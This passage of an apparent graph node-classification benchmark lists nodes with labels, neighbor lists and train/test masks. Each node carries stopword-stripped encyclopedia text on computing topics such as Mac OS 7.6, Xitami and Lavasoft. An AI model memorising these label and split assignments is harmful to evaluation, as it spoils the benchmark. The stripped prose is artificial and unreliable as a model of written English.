7.5.3 revision 2 included performance enhancements better reliability powerbooks using third-party ram doubler program improved reliability powerbook 500 2300 5300 series computers powerpc upgrade card improved reliability using startup disk control panel improved reliability copying files 1 gb hard disks system 7.5.3 revision 2.1 shipped performa 6400/180 6400/200 particular release specific machines stability problems system 7.5.3 release 2 new hardware especially video card transferring files localtalk system 7.5.4 pulled due mistake apple components included installer system 7.5.5 included significant performance improvements virtual memory memory management powerpc-based macs including elimination one type 11 error also included number reliability improvements fixes macs using floppy disks equipped dos compatibility card improved hard disk access powerpc powerbooks performa 5400 9500 computers fixes macs included apple tv tuner macintosh tv remote control improvements localtalk networking especially performa 5400 6400 fixes system startup faster 180 mhz macs included powerpc 604 604e processors improved reliability using sound-intensive applications quadra centris computers contained powerpc upgrade card improved stability using multiple background applications shared printers network system 7.5.5 also last system 7 release run 68000-based macs macintosh plus macs roms lack support 32-bit addressing macintosh iicx 7.6 later required 68030 processor 32-bit-addressing-capable rom automatically turn 32-bit addressing boot mac os 7.6 codenamed harmony last major update released 1997 7.6 operating system officially called mac os instead system new features include revamped extensions manager native powerpc code power macs bundled internet tools utilities stable finder increased memory allocation version powertalk feature added 7.5 removed due poor application support support large number older macintosh models dropped minor update mac os 7.6.1 finally ported 68k exception handling routines powerpc turning type 11 errors less harmful errors type 1 2 3 usually crashing applications would often terminate safely instead crashing operating system period apple attempting release completely new modern operating system named copland copland project abandoned 1996 apple announced plans release os update every six months rhapsody would 2001 evolve released mac os x shipped two releases shipped officially branded mac os — mac os 7.6 minor bug fix 7.6.1 future versions released mac os 8–8.6 mac os 9–9.2",
    "neighbors": [
      10755,
      9732,
      1542,
      6150,
      2058,
      1549,
      3598,
      4114,
      6675,
      6165,
      8222,
      9762,
      1534,
      6183,
      1576,
      6186,
      8754,
      9780,
      1592,
      9784,
      10808,
      8767,
      576,
      1090,
      8774,
      1623,
      10840,
      9308,
      3167,
      9312,
      3681,
      2149,
      3691,
      6258,
      10357,
      7292,
      4220,
      1150,
      10365,
      1666,
      4741,
      137,
      6283,
      7307,
      143,
      7824,
      147,
      7830,
      6807,
      5784,
      7842,
      7844,
      11430,
      3241,
      5292,
      3248,
      178,
      8893,
      9406,
      8896,
      4807,
      713,
      4810,
      2768,
      7378,
      213,
      3286,
      9952,
      5864,
      4844,
      5363,
      4345,
      8441,
      11513,
      3324,
      4879,
      11539,
      10516,
      2839,
      11037,
      8480,
      11554,
      4910,
      7983,
      1844,
      7991,
      11066,
      2363,
      7483,
      2365,
      2366,
      11257,
      10052,
      9035,
      8525,
      2383,
      5969,
      8534,
      8540,
      6498,
      3948,
      8557,
      5492,
      9084,
      11649,
      6022,
      6023,
      3977,
      6539,
      5520,
      6048,
      11171,
      942,
      11184,
      8114,
      8115,
      8628,
      10691,
      8665,
      7133,
      7138,
      9700,
      5093,
      5616,
      6128,
      6130,
      5619,
      11251,
      2553,
      7163,
      8700,
      6654
    ],
    "mask": "Test"
  },
  {
    "node_id": 6378,
    "label": 3,
    "text": "AT&T_Unix_PC:amp unix pc 3b1 also known pc7300 unix pc unix workstation computer originally developed convergent technologies later acquired unisys marketed mid- late-1980s despite name 3b1 little common 3b-series computers initial pc7300 model offered modest 512 kib memory small low performance 10 mb hard drive model although progressive offering unix system desktop office operation underpowered produced considerable fan drive bearing noise even idling modern-looking wedge design innovative fact machine gained notoriety appearing many movies token computer later enhanced model renamed 3b1 cover redesigned accommodate full-height 67 mb hard drive cover change added 'hump case expanded onboard memory 1 2 mb well added better power supply operating system based unix system v release 2 extensions 4.1 4.2 bsd system v release 3 convergent technologies last release 3.51 store public domain software repository available 3b1 users",
    "neighbors": [
      4614,
      787,
      2073,
      9633,
      10668,
      7983,
      563,
      8502,
      9151,
      6850,
      8524,
      9166,
      3039,
      1121,
      6502,
      10855,
      1776,
      5492,
      3960,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 6379,
    "label": 8,
    "text": "Xitami:xitami xitami web ftp server originally developed imatix corporation free open-source product 1996 2000 ran single process small footprint fast fastest servers scaled well supported several web application protocols portable also web interface configure web/ftp server 2009 imatix launched new version xitami called x5 xitami/5 imatix started original xitami server 1996 demonstration smt multithreading technology building protocol servers name chosen last minute developers realized original choice cosmos already taken another web server longer exists xitami imatix spelled backwards xitami featured april 1997 article dr. dobb journal web server attracted people looking fast simple web/ftp server mainly microsoft windows xitami designed portable ported windows linux unices openvms beos os/2 non-portable functionality encapsulated library layer called sfl standard function library sfl free open source project used fairly widely projects 1999 apache web server adopted similar approach portability apache2 building apache portable runtime apr xitami team continued add features mid-2000 development server stopped except security updates 2008 multiple codice_1 vulnerabilities reported final release xitami/2.5 january 2009 imatix announced start new xitami project version 5 called x5 uses latest generation imatix multithreading technology base2 making xitami scalable multiple cores remaining small simple imatix stated designed handle thousands connections without difficulty makes ready long polling client connections remain open extended durations windows binaries x5 released february 2009 x5 used first time run imatix live zyre website x5 shares technical framework imatix openamq message service x5 written ansi c99 using meta-programming approach called model oriented programming x5 presented fosdem 2009 consisting 3,457 lines meta-meta code x5 uses apr place sfl run windows linux aix solaris openvms",
    "neighbors": [
      1920,
      4485,
      7430,
      6797,
      9229,
      7567,
      7695,
      1937,
      7443,
      5397,
      8350,
      7457,
      3746,
      8994,
      2596,
      3237,
      9125,
      11682,
      7338,
      9387,
      44,
      7983,
      10800,
      11439,
      823,
      6714,
      10622,
      7364,
      1991,
      11134,
      595,
      1363,
      4439,
      3545,
      225,
      865,
      1250,
      2404,
      4837,
      5612,
      9580,
      2287,
      11376,
      8691,
      10611,
      119,
      11386,
      3966
    ],
    "mask": "None"
  },
  {
    "node_id": 6380,
    "label": 2,
    "text": "MythDora:mythdora mythdora specialized operating system based fedora mythtv since 2009 version number comes version fedora used followed version mythtv used example current version 12.23 uses fedora 12 mythtv 0.23 like linhes mythdora designed simplify installation mythtv home theatre pc mythdora since version 10.21 live cd support addition mythtv plugins mythdora includes extra linux packages necessary mythtv run drivers hardware commonly encountered machines intended run mythtv also included mythdora several video game emulators extra tools scripts aid initial configuration system allow user perform tasks rebooting machine backing program data directly mythtv interface development discontinued 2011 august 3 2011 project maintainers indicated longer time keep project going",
    "neighbors": [
      8837,
      7435,
      6797,
      10127,
      2321,
      5397,
      4887,
      10394,
      673,
      3745,
      10530,
      1700,
      9253,
      10149,
      6055,
      11305,
      6058,
      7854,
      7983,
      561,
      2738,
      4147,
      7602,
      4790,
      823,
      439,
      56,
      59,
      8124,
      3903,
      4673,
      2375,
      4039,
      8907,
      3664,
      1107,
      1110,
      2134,
      9693,
      2914,
      485,
      3685,
      9064,
      4841,
      6890,
      4219,
      5612,
      7020,
      5742,
      2671,
      7534,
      7913,
      7920,
      8177,
      9074,
      9461,
      10860,
      6393,
      2811,
      11388,
      8957,
      1150
    ],
    "mask": "Test"
  },
  {
    "node_id": 6381,
    "label": 4,
    "text": "PERMIS:permis permis privilege role management infrastructure standards sophisticated policy-based authorization system implements enhanced version u.s. national institute standards technology nist standard role-based access control rbac model permis supports distributed assignment roles attributes users multiple distributed attribute authorities unlike nist model assumes centralised assignment roles users permis provides cryptographically secure privilege management infrastructure pmi using public key encryption technologies x.509 attribute certificates maintain users attributes permis provide authentication mechanism leaves application determine use permis strength comes ability integrated virtually application authentication scheme like shibboleth internet2 kerberos username/passwords grid proxy certificates public key infrastructure pki standard rbac system permis main entities permis policy extensible markup language xml -based rules user-role assignments role-privilege assignments latter containing optional obligations returned application user granted access resource permis policy stored either simple text xml file attribute within signed x.509 attribute certificate provide integrity protection tampering detection user roles attributes may held secure signed x.509 attributes certificates stored lightweight directory access protocol ldap directories web-based distributed authoring versioning webdav repositories may created demand security assertion markup language saml attribute assertions permis authorisation engine comprises two components credential validation service validates users roles according user-role assignment rules policy decision point pdp evaluates users access requests according role-permission assignment rules access control rules access resource depends upon roles/attributes assigned user role-permission assignments contain constraints based user access request e.g print less 10 pages environment e.g time day permis work either push mode user attribute assignments sent permis application pull mode permis fetches attribute assignments ldap/webdav repositories saml attribute authorities permis open source project java source code downloaded http //www.openpermis.info alternatively precompiled java libraries downloaded http //sec.cs.kent.ac.uk/permis/ permis unique support cryptographically protecting user attributes/roles policy guarantees integrity protects tampered new features continually added like standard extensible access control markup language xacml interface allows permis xacml pdps seamlessly interchanged ability accept saml attribute assertions support dynamic delegation authority separation duty policies recent addition controlled natural language interface english writing simple permis policies",
    "neighbors": [
      160,
      3521,
      8674,
      5956,
      5573,
      7368,
      10831,
      210,
      6098,
      6651,
      2013,
      479
    ],
    "mask": "None"
  },
  {
    "node_id": 6382,
    "label": 4,
    "text": "Lavasoft:lavasoft adaware formerly known lavasoft software development company produces spyware malware detection software including adaware operates subsidiary avanquest division company offers adaware three editions one free two pro total commercial adaware products include adaware ad block adaware web companion lavasoft digital lock lavasoft file shredder lavasoft privacy toolbox lavasoft registry tuner adaware headquarters montreal canada previously located gothenburg sweden since 2002 nicolas stark ann-christine åkerlund established company germany 1999 flagship adaware antivirus product 2011 lavasoft acquired solaria fund private equity fund front entrepreneurs daniel assouline michael dadoun accused selling software available free including adaware antivirus prior acquiring company anti-spyware anti-virus software program adaware antivirus according developer detects removes malware spyware adware computer viruses dialers trojans bots rootkits data miners parasites browser hijackers tracking components adaware antivirus originally developed ad-aware 1999 highlight web beacons inside internet explorer many websites users would see tiny pixelated square next web beacon warning user computer ip address non-essential information tracked website time ad-aware added ability block beacons ads 2008 edition lavasoft bundled ad-aware pro plus first time antivirus scanner used avira engine arrangement continued years starting ad-aware version 10 bitdefender antivirus engine used instead according pc world magazine older version ad-aware anniversary edition could locate 83.6 malware comparative test carried security firm av-test however stated tests run newest version neil j. rubenking pcmag performed lab test version 8.3 ad-aware scored 9.2 points beating previous top score 9.1 july 2013 adaware antivirus free listed downloaded total 450 million times lavasoft site including 387 million times download.com according opswat january 2015 ad-aware less 1 market share globally paid versions product competed low-cost free products microsoft security essentials company acquired january 2011 lavasoft solaria fund private equity fund front daniel assouline michael dadoun key people upclick interactive brands sc magazine reported lavasoft acquired entrepreneurs accused selling software available free unwitting users guise premium support including free version lavasoft security program prior acquiring company security consultant dancho danchev documented controversy additionally danchev reported 2013 lavasoft used hide hard-to-uninstall programs third-party software trick users installing like k-lite codec pack lavasoft web companion changed browser without given permission although company shields behind complete legality bundled software claims software used fight malware users branded products malware february 2015 reported cert coordination center new security feature ad-aware web companion implemented komodia ssl digestor one komodia public sdks company behind superfish security incident lenovo machines",
    "neighbors": [
      4480,
      2049,
      7809,
      131,
      10756,
      1417,
      7948,
      6797,
      1046,
      4374,
      10392,
      1052,
      156,
      2721,
      5281,
      2213,
      550,
      1318,
      6823,
      2601,
      7337,
      2859,
      3243,
      6699,
      8493,
      5935,
      7983,
      9771,
      6834,
      4403,
      10166,
      7739,
      9791,
      704,
      9537,
      7362,
      1475,
      10308,
      4421,
      202,
      1355,
      8614,
      5069,
      10574,
      8615,
      10708,
      2005,
      11225,
      1242,
      2907,
      7515,
      8668,
      2654,
      9055,
      9569,
      8932,
      11622,
      106,
      877,
      9713,
      3955,
      6643,
      9341,
      127
    ],
    "mask": "Test"
  },
  {
    "node_id": 6383,
    "label": 1,
    "text": "Database_administration:database administration database administration function managing maintaining database management systems dbms software mainstream dbms software oracle ibm db2 microsoft sql server need ongoing management corporations use dbms software often hire specialized information technology personnel called database administrators dbas three types dbas individuals usually specialize one type database administration smaller organizations uncommon find single individual group performing one type database administration degree administration database automated dictates skills personnel required manage databases one end spectrum system minimal automation require significant experienced resources manage perhaps 5-10 databases per dba alternatively organization might choose automate significant amount work could done manually therefore reducing skills required perform tasks automation increases personnel needs organization splits highly skilled workers create manage automation group lower skilled line dbas simply execute automation database administration work complex repetitive time-consuming requires significant training since databases hold valuable mission-critical data companies usually look candidates multiple years experience database administration often requires dbas put work off-hours example planned hours downtime event database-related outage performance severely degraded dbas commonly well compensated long hours one key skill required often overlooked selecting dba database recovery part disaster recovery case “ ” case “ ” database suffers failure ranging simple failure full catastrophic failure failure may data corruption media failure user induced errors either situation dba must skills recover database given point time prevent loss data often dbms software comes certain tools help dbas manage dbms tools called native tools example microsoft sql server comes sql server management studio oracle tools sql*plus oracle enterprise manager/grid control addition 3rd parties bmc quest software embarcadero technologies sql maestro group offer gui tools monitor dbms help dbas carry certain functions inside database easily another kind database software exists manage provisioning new databases management existing databases related resources process creating new database consist hundreds thousands unique steps satisfying prerequisites configuring backups step must successful next start human expected complete procedure exact way time time exactly goal multiple databases exist number dbas grows without automation number unique configurations frequently grows costly/difficult support complicated procedures modeled best dbas database automation software executed standard dbas software created specifically improve reliability repeatability procedures stratavia data palette gridapp systems clarity automated database operations grown since 2009 following amazon web services introduction aws rds providing automated managed database service microsoft azure launched similar automated database service 2010 sql azure providing automated backups geo-replication high availability introduction docker software containers enhanced support fast delivery containerized database instances amazon web serices microsoft azure enhanced automated support containers respective services third party support database container images grown including mongodb postgres mysql oracle microsoft sql server microsoft independent port docker software windocks newer technologies stratavia data palette suite gridapp systems clarity begun increase automation databases causing reduction database related tasks however best reduces amount mundane repetitive activities eliminate need dbas intention dba automation enable dbas focus proactive activities around database architecture deployment performance service level management every database requires database owner account perform schema management operations account specific database log data director add database owner accounts database creation data director users must log database-specific credentials view database entities data perform database management tasks database administrators application developers manage databases appropriate permissions roles granted organization administrator permissions roles must granted database group database apply within organization granted several education institutes offer professional courses including late-night programs allow candidates learn database administration also dbms vendors oracle microsoft ibm offer certification programs help companies hire qualified dba practitioners college degree computer science related field helpful necessarily prerequisite",
    "neighbors": [
      8201,
      2068,
      1049,
      5658,
      9248,
      8742,
      10793,
      10286,
      4155,
      11324,
      9286,
      72,
      2632,
      9290,
      7248,
      8788,
      10326,
      7767,
      11362,
      9828,
      10340,
      8808,
      2669,
      2681,
      1146,
      3196,
      2688,
      10389,
      4255,
      4263,
      10413,
      5808,
      10418,
      9397,
      3768,
      7868,
      11457,
      6850,
      2246,
      9942,
      10459,
      2780,
      734,
      10471,
      7412,
      2810,
      9467,
      9481,
      10505,
      8979,
      7446,
      10518,
      4376,
      11030,
      5403,
      7968,
      290,
      1314,
      7461,
      2344,
      1341,
      4416,
      2369,
      5441,
      5953,
      10048,
      8518,
      6479,
      853,
      2901,
      10069,
      860,
      2910,
      9075,
      9079,
      11136,
      10632,
      1935,
      2456,
      9112,
      10137,
      9631,
      9634,
      1447,
      7080,
      5550,
      3004,
      9663,
      9177,
      987,
      9183,
      4065,
      7650,
      6124,
      2544,
      10737
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6384,
    "label": 4,
    "text": "Svalbard_Global_Seed_Vault:svalbard global seed vault svalbard global seed vault secure seed bank norwegian island spitsbergen near longyearbyen remote arctic svalbard archipelago approximately north pole conservationist cary fowler association consultative group international agricultural research cgiar started vault preserve wide variety plant seeds duplicate samples spare copies seeds held gene banks worldwide seed vault attempt ensure loss seeds genebanks large-scale regional global crises seed vault managed terms spelled tripartite agreement among norwegian government crop trust nordic genetic resource center nordgen norwegian government entirely funded vault approximately 2008 construction storing seeds vault free end users norway crop trust pay operational costs primary funding trust comes organisations bill melinda gates foundation various governments worldwide nordic gene bank ngb since 1984 stored backup nordic plant germplasm via frozen seeds abandoned coal mine svalbard january 2008 nordic gene bank merged two nordic conservation groups form nordgen svalbard global seed vault officially opened 26 february 2008 although first seeds arrived january 2008 five percent seeds vault 18,000 samples 500 seeds came centre genetic resources netherlands cgn part wageningen university netherlands part vault first anniversary 90,000 food crop seed samples placed storage bringing total number seed samples 400,000 among new seeds included 32 varieties potatoes ireland national gene banks 20,000 new samples u.s agricultural research service seed samples came canada switzerland well international seed researchers colombia mexico syria shipment brought total number seeds stored vault 20 million anniversary vault contained samples approximately one-third world important food crop varieties also part anniversary experts food production climate change met three-day conference longyearbyen japanese sculptor mitsuaki tanabe presented work vault named seed 2009 momi in-situ conservation 2010 delegation seven u.s. congressmen handed number different varieties chili pepper 2013 approximately one-third genera diversity stored gene banks globally represented seed vault october 2016 seed vault experienced unusually large degree water intrusion due higher average temperatures heavy rainfall common water seep vault entrance tunnel warmer spring months case water encroached tunnel freezing vault designed water intrusion seeds risk result however norwegian public works agency statsbygg plans make improvements tunnel prevent intrusion future including waterproofing tunnel walls removing heat sources tunnel digging exterior drainage ditches seed vault 10th anniversary 26 february 2018 shipment 70,000 samples delivered facility bringing number samples received one million counting withdrawals time total number samples held vault 967,216 representing 13,000 years agricultural history norway sweden finland denmark iceland prime ministers ceremonially laid first stone 19 june 2006 seedbank inside sandstone mountain spitsbergen island employs robust security systems seeds packaged special three-ply foil packets heat sealed exclude moisture facility managed nordic genetic resource center though permanent staff on-site spitsbergen considered ideal lacked tectonic activity permafrost aids preservation sea level keep site dry even ice caps melt locally mined coal provides power refrigeration units cool seeds internationally recommended standard equipment fails least several weeks elapse facility rises surrounding sandstone bedrock temperature estimated take two centuries warm feasibility study prior construction determined vault could preserve major food crops seeds hundreds years including important grains could potentially remain viable thousands years running length facility roof front face entryway illuminated artwork named perpetual repercussion norwegian artist dyveke sanne marks location vault distance norway government-funded construction projects exceeding certain cost must include artwork norwegian state agency overseeing art public spaces engaged artist install lighting highlights importance qualities arctic light roof vault entrance filled highly reflective stainless steel mirrors prisms installation reflects polar light summer months winter network 200 fibre-optic cables gives piece muted greenish-turquoise white light svalbard global seed vault mission provide safety net accidental loss diversity traditional genebanks popular press emphasized possible utility event major regional global catastrophe frequently accessed genebanks lose samples due mismanagement accident equipment failures funding cuts natural disasters events occur regularity war civil strife history destroying genebanks national seed bank philippines damaged flooding later destroyed fire seed banks afghanistan syria iraq lost completely according economist svalbard vault backup world 1,750 seed banks storehouses agricultural biodiversity norwegian law prohibited storing genetically modified seeds vault adjacent arctic world archive provides similar service data etched code reels film project lead piql norway states film properly preserved last 1,000 years vault seed samples copies samples stored depositing genebanks researchers plant breeders groups wishing access seed samples seed vault must instead request samples depositing genebanks samples stored genebanks cases accessible accordance terms conditions international treaty plant genetic resources food agriculture approved 118 countries parties seed vault functions like safe deposit box bank bank owns building depositor owns contents box government norway owns facility depositing genebanks seeds send deposit samples svalbard constitute legal transfer genetic resources genebank terminology called black box arrangement depositor signs deposit agreement nordgen acting behalf norway agreement makes clear norway claim ownership deposited samples ownership remains depositor sole right access materials seed vault one access anyone else seeds seed vault database samples depositors maintained nordgen syrian civil war caused another seed bank international center agricultural research dry areas icarda move headquarters aleppo beirut due difficulties icarda transferring collection 2015 svalbard vault authorized first withdrawal seeds history seeds stored sealed three-ply foil packages placed plastic tote containers metal shelving racks storage rooms kept low temperature limited access oxygen ensure low metabolic activity delay seed aging permafrost surrounding facility help maintain low temperature seeds electricity supply fails years since opening vault saw minor water intrusion entrance annual spring permafrost thawing warmer temperatures heavy rainfall october 2016 caused significantly greater amounts water inundate entrance facility design ensured water froze several meters seeds endangered crop trust officially known global crop diversity trust plays key role planning seed vault coordinating shipments seed samples vault conjunction nordic genetic resource center trust provides annual operating costs facility set aside endowment funds norwegian government finances upkeep structure support bill melinda gates foundation donors crop trust assists selected genebanks developing countries well international agricultural research centres packaging shipping seeds seed vault international advisory council provides guidance advice includes representatives fao cgiar international treaty plant genetic resources institutions svalbard global seed vault ranked 6 time best inventions 2008 awarded norwegian lighting prize 2009 seed sample consists approximately 500 seeds sealed airtight aluminum bag facility storage capacity 4.5 million seed samples",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 6385,
    "label": 2,
    "text": "Visifire:visifire visifire set data visualization components currently supports charts gauges visifire available microsoft silverlight wpf windows phone windows 8 one use api create charts gauges mobile web desktop environments visifire also embedded webpage standalone silverlight app independent server side technology used hence visifire used asp asp.net php jsp coldfusion ruby rails simple html javascript visifire also wizard-driven solution create charts sharepoint visifire development started early release silverlight 1.1 alpha microsoft next release silverlight directly silverlight 2.0 beta ported silverlight 2.0 beta release silverlight 2.0 final opened slew possibilities exploit full power silverlight 2.0 major architectural changes done new visifire 2.0 released later came visifire 3.0 improved looks major performance improvements gauges introduced visifire 4.0 later visifire sharepoint introduced wizard driven solution create stunning sharepoint charts next major update visifire support windows phone windows 8 applications recently released version visifire 5.0 major performance improvements current version visifire 5.1.5 visifire runs various platforms silverlight wpf windows phone windows 8 visifire licensed commercially one buy royalty free license based number developers distributed gpl discontinued due confusion prevailing around windows phone marketplace priority support provided enterprise customers ticket system users supported visifire community forum",
    "neighbors": [
      8644,
      1348,
      3462,
      7983,
      5048
    ],
    "mask": "None"
  },
  {
    "node_id": 6386,
    "label": 4,
    "text": "City_identification_card:city identification card united states city municipal identification card form identification card issued municipality city rather state federal government federal law cities may issue identification cards see fit consider immigration criminal status applicant new connecticut issued first municipal identification cards united states elm city resident card 2007 january 15 2009 city/county san francisco launched sf city id card municipal identification card program modeled new cities issue identification cards include asbury park new jersey washington d.c. dc one card mercer county new jersey community id card issued local non profit organization endorsement various law enforcement agencies august 31 2016 city council phoenix arizona voted 5 4 create city identification card would available undocumented immigrants cards available february 2017 program cancelled february 2018 november 8 2012 los angeles city council voted 12 1 solicit proposals municipal identification card modeled oakland city id system city oakland california debated proposed municipal identification system would include debit card function city residents regardless immigration status move backed oakland city id card coalition september 13 2011 oakland city council decided wait cost feasibility study completed late october proceeding hoping begin issuing id cards 2012 barring unforeseen circumstances however extended 2012 city council voting favor final portion program october 16 2012 first cards program slated issued february 1 july 5 2011 richmond city council voted unanimously issue municipal identification cards richmond residents regardless immigration status letter council urging passage measure city council member mayor argued many richmond residents lack necessary forms official identification required access financial institutions jobs housing protections home workplace residents include immigrants children students homeless transgender people indigent disabled elderly runaway youth adult survivors domestic violence program administered third-party vendor cost city november 2007 board supervisors san francisco voted issue municipal id cards residents city regardless immigration status cards officially launched january 15 2009 proof identity city residence required elm city resident card id card used new connecticut united states card originally designed protect estimated 10,000 15,000 illegal immigrants new robbed assaulted city residents receive card serves form identification debit card capacity 150 library card way pay parking meters cards first issued july 2007 first municipal identification cards issued united states card costs 5 children 10 adults hartford connecticut 2017 first issued may 22 2017 hartford city id government-issued identification card available hartford residents verify identification residency status hartford aventura florida issues optional aventura id card residents delray beach florida issues optional residency identification card sunny isles beach florida offers free optional sunny isles beach resident id card residents october 12 2016 chicago mayor rahm emanuel city clerk susana mendoza announced launch chicago municipal id program april 26 2018 city officials launched chicago citykey optional valid government-issued id card offered chicago residents citykey serves three-in-one card valid government issued id ventra card chicago transit authority chicago public library services first 100,000 id cards free cost initial response chicago citykey extremely high successful city wards residents waited hours line receive card may 17 2016 city council detroit michigan voted favor creation municipal identification program city residents struggle otherwise obtain government-issued id december 5 2017 city council northfield minnesota unanimously approved ordinance establishing city identification card program implemented march 2018 county clerk hudson county new jersey barbara a. netchert issues identification cards resident county cards available residents county fee ten dollars adults five dollars minors specified county teenagers aged fourteen sixteen starting april 2011 mercer county area community id card issued endorsement offices mercer county sheriff mercer county prosecutor police departments several municipalities including trenton princeton borough princeton township west windsor ewing township plainsboro card issued non profit latin american legal defense education fund laldef accepted law enforcement agencies municipal agencies clinics hospitals libraries social service agencies many stores banks although official government id card facilitates access basic community services unable obtain documents immigrants youth homeless persons recovery re-entry programs card replaces trenton princeton community id cards issued 2009 2010 county clerk monmouth county new jersey m. clark french issues identity cards residents county cards available u.s. citizens legal permanent residents asbury park issues identification card city residents cards became available august 1 2015 dover new jersey offers municipal id card elizabeth new jersey offers municipal id card highland park new jersey offers municipal id card new brunswick new jersey offers new brunswick city id card city newark introduced municipal identification program august 2015 residents newark cards cost 15 new applicants however new applicants senior citizens children cost 8 financial hardship application filed city fees unable met applicant jersey city city council announced municipal identification program april 2017 morristown new jersey offers municipal id card paterson new jersey offers municipal id card perth amboy new jersey offers municipal id card starting november 2013 plainfield community id cards issued support plainfield police department card issued non-profit group angels action inc trained mentored latin american legal defense education fund laldef mercer county identification local identity cards grant legal residency right work approved plainfied city cooperation card also accepted law enforcement agencies municipal agencies clinics hospitals libraries social service agencies many stores banks angels action local organizations also process trying encourage plainfield city council approve municipal identity id card system supply cards larger scale growing population plainfield angels actions also helped mentor encourage id cards newark roselle city council roselle new jersey unanimously passed ordinance allow borough launch community-wide identification card program october 21 2015 began issuing cards december 14 2015 union city nj board commissioners decided enact municipal identification program starting march 1 2017 program open resident city older 14 system part set allow residents city gain identification securing financial services e.g bank checking account july 2007 new york city councilman hiram monserrate proposed setting municipal identity system new york city residents similar new plan however shortly thereafter monserrate left council new york state senate proposal shelved february 10 2014 first state city address new york city mayor bill de blasio announced new plan create new york city municipal identification card named idnyc would available new yorkers regardless immigration status city resident could obtain card mayor announced way allow city residents lack legal immigration status united states access municipal private services facilities require photo identification cards also provide additional benefits discounts movie tickets broadway shows sporting events ymca memberships additionally cardholders able open bank account several financial institutions new york city cards first made available january 12 2015 philadelphia issues optional identification card city residents phl city id cards became available april 2019 providence rhode island issues optional identification card city residents idpvd cards became available june 2018 may 1 2014 washington d.c. issues dc one card legal residents visitors u.s. though services may available residents district undocumented immigrants may get card issued state driver license state non-driver id card one states issues credentials illegal immigrants new mexico utah washington school id card dc one card consolidated credential designed give adults children access dc government facilities programs designed help district consolidate printing id cards save money dc one card also building access card dc government employees public school secondary students request card includes immediate metro smartrip® capability help travel milwaukee issues optional municipal identification card residents",
    "neighbors": [
      9555,
      5932
    ],
    "mask": "Train"
  },
  {
    "node_id": 6387,
    "label": 3,
    "text": "10-Yard_Fight:10-yard fight 10-yard fight viewed top-down perspective vertical scrolling player select plays either offense defense offense player simply receives ball upon snap either attempts run quarterback toss ball running back throw ball one long distance receiver – basically option offense defense player chooses one two players control computer manipulates others ball also punted field goal attempted game five levels increasing difficulty high school college professional playoff super bowl player wins halves accelerated real time 30-minute half easier level player advances next level difficulty like career mode arcade game later ported famicom irem first japan later published north america europe nintendo 1985 nintendo entertainment system nes arcade game also ported msx home computer also irem exclusively japan graphically similar fundamental differences arcade nes versions game arcade version seeks simulate offense team attempting score touchdown ultimately leads player next level nes version developed allow defense offense well simultaneous 2-player mode may 2 2018 port nintendo switch released hamster part arcade archives series pittsburgh post-gazette called patriarch football games adam duerson sports illustrated stated one remembered could say makes great worth recognition fact brought football games atari era setting simple precedent future football games adam swiderski ugo networks called downright advanced compared earlier football titles added looked neat quality soundtrack n't play like real football nick chordas columbus dispatch said realistic time commenting players looked like real people n-sider called like racing game football game due objective racing first increase players time author bj klein however called less realistic tecmo bowl journal news called immortal classic",
    "neighbors": [
      1776,
      10931,
      11557,
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 6388,
    "label": 5,
    "text": "SCVP:scvp server-based certificate validation protocol scvp internet protocol determining path x.509 digital certificate trusted root delegated path discovery validation path delegated path validation according particular validation policy relying party receives digital certificate needs decide whether trust certificate first needs determine whether certificate linked trusted certificate process may involve chaining certificate back several issuers following case currently creation chain certificates performed application receiving signed message process termed path discovery resulting chain called certification path many windows applications outlook use cryptographic application programming interface capi path discovery capi capable building certification paths using certificates installed windows certificate stores provided relying party application equifax ca certificate example comes installed windows trusted certificate capi knows acme co ca certificate included signed email made available capi outlook capi create certification path however capi find acme co ca certificate way verify joe user trusted scvp provides us standards-based client-server protocol solving problem using delegated path discovery dpd using dpd relying party asks server certification path meets needs scvp client request contains certificate attempting trust set trusted certificates scvp server response contains set certificates making valid path certificate question one trusted certificates response may also contain proof revocation status ocsp responses certificates path certification path constructed needs validated algorithm validating certification paths defined rfc 5280 section 6 signatures expiration name constraints policy constraints basic constraints etc. could done locally client scvp server delegated path validation scvp facilitates federated pkis one bridge certificate authority",
    "neighbors": [],
    "mask": "None"
  },
  {
    "node_id": 6389,
    "label": 6,
    "text": "Ark_(software):ark software ark file archiver compressor developed kde included kde applications software bundle supports various common archive compression formats including zip 7z rar lha tar uncompressed compressed e.g gzip bzip2 lzip xz",
    "neighbors": [
      6022,
      10121,
      1420,
      7181,
      1940,
      3222,
      9880,
      543,
      6694,
      3114,
      10027,
      8621,
      950,
      6713,
      2755,
      11076,
      1352,
      4296,
      10317,
      3407,
      6991,
      4561,
      722,
      10575,
      7384,
      11614,
      1631,
      3296,
      9953,
      5858,
      6759,
      7529,
      4459,
      237,
      1646,
      6257,
      7667,
      3828,
      4089,
      894,
      10623
    ],
    "mask": "Train"
  },
  {
    "node_id": 6390,
    "label": 3,
    "text": "Operation_Wolf:operation wolf assuming role special forces operative roy adams player attempts rescue five hostages held captive enemy territory game divided six stages advances story completed example jungle stage completed adams interrogates enemy soldier learns location concentration camp hostages held one first shooter games feature storyline game utilized optical controller housed inside gun assembly scaled bore strong resemblance uzi submachine gun turn mounted top square base covering pivot shaft allowed players swivel elevate gun geared motor inside casing simulated recoil felt player fired weapon in-game targets pulling trigger allowed fully automatic fire pressing button near muzzle launched grenade wide blast radius could hit multiple targets order complete stage player must shoot required number soldiers vehicles trucks boats helicopters armored transports indicated on-screen counter player begins limited supply ammunition grenades find throughout game either openly displayed revealed shooting crates/barrels coconuts trees animals pigs chickens dynamite bombs cause heavy damage every target screen enemy friendly special machine gun power-up allows unlimited ammunition increased rate fire 10 seconds enemies attack gunfire knives grenades mortar/bazooka rounds missiles first shot air player damage bar slowly fills hits taken addition shooting friendly targets nurses boys adds bar damage recovered picking health power-ups completing stages six stages objectives effects gameplay completion follows completing airport stage least one hostage rescued awards bonus based number stages played number hostages boarded plane new operation begins higher difficulty level fully healed damage bar fresh supply ammunition game ends following events occur outcome showing different game screen continuing game allows player restart last stage played language game set english six stages always played order result effects communication setup jungle obvious number enemies particular stage remains constant one operation next language set japanese first four stages initially available player may choose order play allowing strategic planning ported version nintendo entertainment system allowed multiple endings depending many hostages rescued player would awarded points form combat pay greeted president united states number surviving hostages corresponded president tone player game ported amstrad cpc dos nes master system fm towns commodore 64 pc engine ports lack kind light gun support exceptions nes master system zx spectrum featured magnum light phaser support must played keyboard controller box master system version features promotional art operation thunderbolt 2005 operation wolf released xbox playstation 2 microsoft windows part taito 